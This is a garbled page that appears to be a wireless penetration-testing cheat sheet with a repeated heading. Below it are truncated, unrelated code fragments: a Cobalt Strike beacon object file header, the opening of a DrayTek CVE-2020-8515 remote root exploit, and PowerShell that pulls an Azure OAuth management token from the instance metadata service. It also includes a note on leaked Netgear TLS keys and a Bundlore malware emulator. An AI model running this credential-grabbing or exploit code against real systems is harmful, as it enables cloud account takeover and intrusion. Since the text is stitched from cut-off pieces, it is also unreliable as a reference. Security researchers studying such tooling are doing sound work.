# Wireless Penetration Testing Cheat Sheet
## WIRELESS ANTENNA
- Enable monitor mode on the interface
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
| #include <string.h> | |
| #include <stdio.h> | |
| #include <windows.h> | |
| #include <psapi.h> | |
| #include "beacon.h" | |
| DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcesses(DWORD *, DWORD, LPDWORD); | |
| DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD); | |
| DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcessModulesEx(HANDLE, HMODULE*, DWORD, LPDWORD, DWORD); |
# Wireless Penetration Testing Cheat Sheet
## WIRELESS ANTENNA
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
| import sys | |
| import random | |
| import binascii | |
| import struct | |
| import os | |
| from ctypes import * | |
| from ctypes.wintypes import * | |
| # Shorthands for some ctypes stuff. |
| package main | |
| /* | |
| CVE-2020-8515: DrayTek pre-auth remote root RCE | |
| Mon Mar 30 2020 - 0xsha.io | |
| Affected: |
| #---------Query MetaData for SubscriptionID---------# | |
| $response2 = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/instance?api-version=2018-02-01' -Method GET -Headers @{Metadata="true"} -UseBasicParsing | |
| $subID = ($response2.Content | ConvertFrom-Json).compute.subscriptionId | |
| #---------Get OAuth Token---------# | |
| $response = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing | |
| $content = $response.Content | ConvertFrom-Json | |
| $ArmToken = $content.access_token |
There are at least two valid, signed TLS certificates that are bundled with publicly available Netgear device firmware.
These certificates are trusted by browsers on all platforms, but will surely be added to revocation lists shortly.
The firmware images that contained these certificates along with their private keys were publicly available for download through Netgear's support website, without authentication; thus anyone in the world could have retrieved these keys.
| from collections import defaultdict | |
| import boto3 | |
| """ | |
| A tool for retrieving basic information from the running EC2 instances. | |
| """ | |
| # Connect to EC2 | |
| ec2 = boto3.resource('ec2') |
| # by [email protected] | |
| # LLDB custom command follow-fork-child, equivalent to GDB "follow-fork-mode child" | |
| # tested on $lldb --version | |
| # lldb-1100.0.30.6 | |
| # Apple Swift version 5.1.2 (swiftlang-1100.0.278 clang-1100.0.33.9) | |
| # (lldb) script | |
| # Python Interactive Interpreter. To exit, type 'quit()', 'exit()' or Ctrl-D. | |
| # >>> import sys | |
| # >>> print(sys.version) |
| from unicorn import * | |
| from unicorn.x86_const import * | |
| from abc import ABC, abstractmethod | |
| class bundlore_emulation(ABC): | |
| def __init__(self): | |
| self.mu = Uc(UC_ARCH_X86, UC_MODE_64) | |
| self.BASE = 0x100000000 | |
| self.HEAP_SIZE = 64*1024 | |
| self.STACK_SIZE= 32*1024 |